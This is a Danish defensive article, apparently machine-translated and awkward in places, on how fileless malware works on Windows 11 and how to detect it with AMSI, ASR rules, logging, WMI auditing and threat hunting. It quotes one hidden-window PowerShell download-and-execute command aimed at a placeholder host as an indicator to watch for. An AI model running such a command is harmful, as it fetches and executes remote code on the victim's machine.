
El filløs malware Det er blevet en af de hovedpiner, der bliver ved med at vokse i ethvert moderne Windows-miljø, inklusive Windows 11. Denne type angreb undgår harddisken og er afhængig af hukommelse, scripts og legitime systembinære filer, så signaturbaserede antivirusprogrammer har meget svært ved at opdage det i tide.
For at finde det med en vis pålidelighed "Det er ikke nok at køre en antivirusscanning"Det er nødvendigt at kombinere omfattende procestelemetri, adfærdsanalyse, hukommelsesinspektion og effektiv brug af native Windows-kontroller (PowerShell, WMI, registreringsdatabase, AMSI, ASR-regler osv.). Derudover er det vigtigt at forstå i detaljer, hvad filløs malware egentlig er, hvilke varianter der findes, hvordan den kommer ind i systemer, hvordan den vedvarer, og hvilke spor den efterlader, selvom alt foregår i RAM.
Hvad er filløs malware, og hvorfor er det så problematisk i Windows 11?
Når vi taler om filløs malware vi henviser til ondsindet kode Den behøver ikke at efterlade nye, synlige eksekverbare filer i filsystemet for at fungere. Den indsætter sig typisk i eksisterende processer og kører direkte i hukommelsen ved at udnytte Microsoft-signerede værktøjer som f.eks. PowerShell, WMI, rundll32, mshta eller VBScript/JScriptDette reducerer dens fodaftryk og gør det muligt for den at undgå at blive opdaget af motorer, der kun analyserer mistænkelige filer på disken.
Selv Office-dokumenter, PDF-filer eller phishing-links Filer, der udløser kommandoer og shellcode i hukommelsen, falder ind under dette fænomen, fordi selve filen giver få nyttige oplysninger til analyse. Noget lignende sker med makroer og DDE-mekanismen i Office: skadelig kode kører indlejret i legitime processer som Word eller Excel, uden at der vises nogen usædvanlig eksekverbar fil på disken.
Angriberne slår sig sammen social engineering og udnyttelserEn e-mail med en vedhæftet fil, et link til et kompromitteret websted eller en "uskyldig" makro kan udløse en kæde, hvor et script downloader og udfører dataene i RAM'en og sletter spor så hurtigt som muligt. Det endelige mål kan variere fra at stjæle legitimationsoplysninger og følsomme data til at implementere ransomware, udføre forlænget overvågning (APT) eller bevæge sig lateralt gennem netværket uopdaget.

Typer af filløs malware i henhold til deres fodaftryk på systemet
For at undgå at blande begreber sammen er det nyttigt klassificer trusler efter graden af interaktion med filsystemetDette præciserer, hvad der bevares, hvor koden er gemt, og hvilke retsmedicinske beviser den efterlader.
Type I: ingen filaktivitet
Her taler vi om "ægte" filløshed: koden skriver ikke noget til disken. Et klassisk eksempel er brugen af netværkssårbarheder såsom SMB-angreb (som EternalBlue-angrebet) for at indlæse en bagdør i kernelhukommelsen, såsom DoublePulsar. Hele angrebet foregår i RAM, og der vises ingen nye filer i filsystemet.
Trusler, der falder ind under samme kategori inficere firmware fra BIOS/UEFI, netværkskort, diske eller endda CPU-undersystemer. De fortsætter gennem genstarter og geninstallationer af operativsystemer, og meget få sikkerhedsløsninger inspicerer virkelig dette niveau. Disse angreb er mindre hyppige og meget sofistikerede, men deres kombination af stealth og vedholdenhed Dette gør dem særligt farlige.
Type II: Indirekte arkiveringsaktivitet
I denne gruppe efterlader malwaren ikke sin egen eksekverbare fil, men bruger systemadministrerede containere, der i sidste ende gemmes på disk. For eksempel bagdøre, der gemmer PowerShell-kommandoer eller -scripts i WMI-lagre eller Windows-registreringsdatabasen, og de udløses ved hjælp af hændelsesfiltre eller Run/RunOnce-nøgler. WMI-lagret og registreringsdatabasen findes på disken som legitime databaser, der er vanskelige at rense uden at ændre systemet.
Fra et praktisk synspunkt betragtes de også som filløse, fordi containeren (WMI, registreringsdatabase, bootsektor osv.) Det er ikke en klassisk eksekverbar fil. Og den er skånsom at rengøre. Den endelige effekt er en diskret vedholdenhed med meget få "traditionelle" spor.
Type III: filafhængige hybrider
Her findes ondsindet logik i hukommelsen, i registreringsdatabasen eller i WMI, men den har brug for nogle filbaseret triggerEt typisk eksempel er Kovter: den registrerer et shell-verbum for en sjælden filtypenavn, og når en sådan fil åbnes, udføres et lille script, som via mshta.exe eller andre binære filer rekonstruerer den skadelige nyttelast fra registreringsdatabasen.
Disse "lokkemads"-filer indeholder ikke nyttelast, der kan analyseres som sådan; det virkelige kød er i beholdere som f.eks. Registrering eller WMIDerfor grupperes de normalt under paraplyen af filløse trusler, selvom de strengt taget er afhængige af en eller flere diskartefakter.
Inputvektorer og placeringer, hvor den filløse filløs er skjult
For at forbedre detektion er kortlægning afgørende. Hvor kommer malwaren ind, og i hvilke processer eller objekter findes den?Denne visning hjælper med at implementere specifikke kontroller og prioritere den telemetri, der virkelig betyder noget.
Inden for exploits Vi finder to hovedfamilier. På den ene side er der filbaserede angreb, hvor Office-dokumenter, PDF-filer, eksekverbare filer, LNK-filer eller ældre Flash/Java-indhold udnytter den browser eller det program, der behandler dem, ved at indlæse shellcode i hukommelsen (et typisk tilfælde af massespamkampagner, der bruger Word med makroer). På den anden side har vi netværksbaserede angreb, såsom WannaCry, hvor en ondsindet pakke udnytter en sårbarhed i en tjeneste (SMB, RDP osv.) og opnår direkte udførelse i brugerland eller kerne uden nogensinde at skrive en ny fil til disken.
Der er også en vektor af hardware og firmware Dette er ikke ubetydeligt. Enheder med omprogrammerbar firmware (harddiske, netværkskort, USB-tilbehør af BadUSB-typen), BIOS/UEFI eller endda ondsindede mini-hypervisorer kan introducere kode, der kører under operativsystemet. Disse teknikker falder direkte ind under Type I: forblive uden for operativsystemet og de er ekstremt vanskelige at revidere og udrydde.
Med hensyn til udførelse og injektion misbruger angribere begge dele "Normale" filer såsom scripts i hukommelsenEksekverbare filer (EXE/DLL/LNK) eller planlagte opgaver kan injicere legitime processer. Selv boot-sektoren (MBR/EFI) kan manipuleres af malwarefamilier som Petya til at tage kontrol fra opstart og omgå det traditionelle filsystem.
For at gøre tingene værre har avancerede aktører (APT'er som The Dukes/APT29) demonstreret kampagner med filløse bagdøre som RegDuke eller POSHSPYsom næsten udelukkende findes i hukommelsen, WMI og registreringsdatabasen, og kombinerer forskellige teknikker for at minimere spor.

Filløse angrebskæder: faser og signaler, der skal overvåges
Selvom de ikke efterlader synlige eksekverbare filer, følger filløse angreb stadig en en temmelig genkendelig rækkefølge af faserAt forstå dem er nøglen til at vide, hvilke hændelser og relationer mellem processer der er værd at overvåge.
- Fase af indledende adgang. Det er typisk baseret på phishing med vedhæftede filer eller links, kompromitterede websteder eller stjålne legitimationsoplysninger. Det er meget almindeligt at se, at udgangspunktet er et Office-dokument, som, når aktivt indhold er aktiveret, starter en PowerShell-kommando med mistænkelige parametre (ExecutionPolicy Bypass, skjult vindue, download fra ukendte domæner osv.).
- PersistensfaseDet er her, WMI-filtre og -abonnementer, autorun-nøgler i registreringsdatabasen (Run, RunOnce, Winlogon), misbrug af opgavestyring og ændring af bootsektoren kommer i spil. Malwaren forsøger at sikre, at det skadelige miljø efter en genstart eller logout genindføres i hukommelsen uden at skulle genindføre nye binære filer.
- Fase af Lateral bevægelse og klatringSystemets egne værktøjer (PowerShell Remoting, PsExec, WMI, RDP) tillader adgang fra én computer til en anden ved hjælp af stjålne legitimationsoplysninger. Igen, alt dette gøres "uden for bøgerne": ved hjælp af legitime værktøjer, der allerede er installeret.
- Sidste fase: eksfiltrering og nedslagMalware kan kryptere data (filløs ransomware), exfiltrere information til kommando- og kontrolservere (C2) ved hjælp af browsere, Bitsadmin eller PowerShell eller manipulere kritiske systemer. Gennem hele livscyklussen er nøgleindikatorer skjult i kommandolinjeargumenter, anomale procestræer, mistænkelige udgående forbindelser og injektions-API-kald.
Almindelige filløse angrebsteknikker
Den filløse paraply omfatter mange forskellige teknikker, men flere gentages igen og igen. At forstå dem hjælper med planlægningen. Regler for adfærdsdetektion og effektive jagtkampagner.
En af de mest almindelige er hukommelsesresident malwareAngriberen indlæser nyttelasten i hukommelsesområdet for en betroet proces (f.eks. explorer.exe, svchost.exe eller en browser) og lader den vente på kommandoer. I tilfælde af rootkits og kernel-niveau hooks er graden af skjulning endnu højere, og mange løsninger, der kun ser på brugerområdet, lades blinde.
En anden taktik er persistens i Windows-registreringsdatabasenved at lagre krypterede blobs eller obfuskerede strenge, der derefter rehydreres ved hjælp af legitime launchers som mshta, rundll32 eller wscript. Den lille "loader" kan selvdestruere umiddelbart efter udførelse, så de eneste betydelige spor forbliver i registreringsdatabasenøglerne og hukommelsen.
Man ser også meget af forfalskning af legitimationsoplysningerNår brugernavne og adgangskoder er stjålet, kan angriberen åbne eksterne shells, udføre scripts direkte i konsollen uden at skrive filer og plante lydløse bagdøre i WMI eller registreringsdatabasen. I virksomhedssammenhænge giver dette mulighed for langvarige spionagekampagner med en meget lav detektionsrate, hvis brugen af administrative værktøjer ikke overvåges korrekt.
I den mest synlige del, filløs ransomware Den er i stand til at kryptere data og kommunikere med sin C2-infrastruktur, næsten udelukkende fra hukommelsen. Ofte er det første tegn på, at noget er galt, når filerne allerede er krypteret, fordi de foregående trin ikke har udløst nogen sikkerhedsadvarsler.

Hvorfor det ikke virker at "blokere alt" i virksomheden
Det kan virke fristende at komme til sagen og Deaktiver PowerShell, bloker makroer eller forbyd WMIProblemet er, at du ville ødelægge en stor del af den daglige drift: PowerShell er fundamental for moderne administration, Office er det grundlæggende arbejdsværktøj, og WMI er kernen i Windows-systemadministration.
Alligevel har mange forsøg på at beskytte mod filløse angreb netop baseret sig på dette: meget rigide hvidlister, ustrategisk makroblokering eller simpelthen deaktivering af PowerShell.exe. Angribere har dog arbejdet på dette i et stykke tid. at lære at undvige disse blokke: brug af din egen kopi af PowerShell, indlæsning af den via DLL med rundll32, pakning af scripts i eksekverbare filer, skjulning af kode i billeder (steganografi) eller kald af PowerShell via mellemliggende værktøjer.
En anden almindelig fejl er udelukkende at stole på løsninger, der De bestemmer i skyenHvis endpoint-agenten skal forespørge en fjernserver, før mistænkelig aktivitet stoppes, lider realtidsforebyggelse under dette: du har brug for forbindelse, og derudover introducerer du en forsinkelse, der i hurtige angreb (ransomware, wipers) kan være fatal.
I praksis kræver forsvar mod filløs malware en kombination af Omfattende lokal telemetri, adfærdsdetektionsmotorer på selve endpoint'et Og som et ekstra lag, cloudanalyse til at berige, korrelere og forbedre intelligensen. Men beslutningen om at stoppe en proces eller fortryde ændringer skal kunne træffes lokalt, selv offline.
Sådan registrerer du filløs malware i Windows 11: telemetri og adfærd
Vinderstrategien involverer overvåge processer, hukommelse og adfærdikke kun filer. Ondsindede mønstre er meget mere stabile end varianter af den samme malware, så en adfærdsbaseret tilgang fungerer bedst mod nye eller tilslørede trusler.
I Microsofts økosystem, den Antimalware Scan Interface (AMSI) Det er en nøglekomponent. Det giver dig mulighed for at opfange scripts i PowerShell, VBScript eller JScript (og andre understøttede sprog), selv når de er dynamisk konstrueret i hukommelsen. Før udførelse sendes scriptets indhold til den antimalware-motor, der er registreret af AMSI, hvilket gør det nemmere at opdage mistænkelige strenge, grov obfuskation og typisk malware-adfærd.
Derudover er det vigtigt at have en detaljeret procesovervågningStart- og slutpunkter, PID, overordnede og underordnede processer, eksekverbar sti, hashes, komplet procestræ og, meget vigtigt, komplette kommandolinjer. Mange indikatorer for et angreb er skjult bag flag og argumenter. Kommandoer som powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http://dominiotld/payload') De bør ikke gå ubemærket hen i et nogenlunde modent miljø.
La hukommelsesinspektion Dette er et andet nøgleelement. Det er vigtigt at kunne identificere reflekterede PE-nyttelaster, hukommelsesregioner markeret som eksekverbare i processer, der normalt ikke burde have dem, og typiske injektionsmønstre (WriteProcessMemory, CreateRemoteThread osv.). Moderne løsninger som EDR/Managed EDR (EMDR) og produkter som Microsoft Defender for Endpoint eller platforme som SentinelOne overvåger disse operationer på kerneniveau for at adskille ondsindet aktivitet fra legitim aktivitet.
Alt dette suppleres af specifikke kontroller som f.eks. MBR/EFI-beskyttelse at detektere og vende manipulationer i bootsektoren og med muligheden for at indfange hukommelsesbuffere forbundet med mistænkelige udførelser, så indsatsteams kan generere nye signaturer eller adfærdsregler.
Praktiske trin i Windows 11
Udover at have en kraftfuld EDR-løsning tilbyder Windows 11 også meget nyttige native kontroller for at gøre tingene vanskelige for filløs malware og i øvrigt forbedre synligheden af trusselsjagtopgaver.
forebyggelse
I PowerShell anbefales det at aktivere Scriptbloklogning og modullogningAnvend begrænsede tilstande, hvor det er muligt, og overvåg brugen af ExecutionPolicy Bypass og skjulte vinduer. Dette giver en historik over udførte scripts, selvom de blev genereret dynamisk, og er uvurderlig til at detektere post-exploits med PowerShell.
den Regler for reduktion af angrebsflader (ASR) De gør det muligt at blokere Office fra at oprette processer, der er målrettet mod PowerShell, cmd, mshta eller andre højrisikokomponenter, samt forhindre misbrug af WMI eller PsExec, når disse ikke er nødvendige. Når de er korrekt konfigureret, reducerer de drastisk den filløse angrebsflade i kontormiljøer uden at forstyrre forretningsdriften.
På kontorfronten er det vigtigt hærd makroerneMålet er at deaktivere dem som standard, kun tillade internt signerede makroer, bruge strenge tillidslister og gennemgå ældre DDE-baserede arbejdsgange. Målet er at sikre, at åbning af et dokument modtaget via e-mail ikke giver frit spil til at udføre noget på systemet.
For vedholdenhedsaspektet er det essentielt Revider WMI, registreringsdatabasen og planlagte opgaverAbonnementer på begivenheder skal overvåges. root\Subscription, klasser som __EventFilter, CommandLineEventConsumer y __FilterToConsumerBindingsamt Run/RunOnce-nøgler og nye opgaver, der aktiverer mistænkelige scripts eller binære filer. Værktøjer som Sysmon er meget nyttige til at generere omfattende hændelser; i store miljøer giver det mening at stole på en EDR og en god SIEM.
Som altid lapning og hærdning Sikkerhed for operativsystemet, browsere, Office og netværkstjenester er en grundlæggende forsvarslinje. Mange filløse indbrud starter med at udnytte kendte sårbarheder, der kunne være blevet rettet med rutinemæssige opdateringer.
Jagt
Det giver mening at fokusere søgninger på unormale udførelsesmønstreOffice-processer, der starter PowerShell eller mshta, kommandolinjer med downloadstring/downloadfile, scripts med tydelig obfuscation, refleksinjektioner og udgående forbindelser til mistænkelige domæner eller usædvanlige TLD'er. Krydsreferencer til alt dette med omdømme- og frekvensoplysninger kan reducere støj og afdække diskrete kampagner.
Endelig må man ikke glemme brugernes og tekniske teams bevidsthedAt lære brugerne at identificere phishing-e-mails, farlige vedhæftede filer, mistænkelige links eller mærkelig computeradfærd (vinduer, der lukker af sig selv, flygtige konsolprocesser) er fortsat en meget omkostningseffektiv barriere mod massive filløse kampagner.
Realiteten er, at filløs malware ikke længere er en sjældenhed, men en almindelig teknik i målrettede angreb og massive kampagner, der misbruger scripts. Med fokus på procesadfærd, hukommelsesforbrug og oprindelsen af hver udførelseVed at udnytte AMSI, telemetri af høj kvalitet, Windows 11-kontroller og EDR-platforme med adfærdsanalyse, og supplere alt dette med realistiske politikker for makroer, PowerShell og WMI, sætter man enhver organisation i en langt bedre position til at opdage og bryde disse kæder, før de forårsager en katastrofe.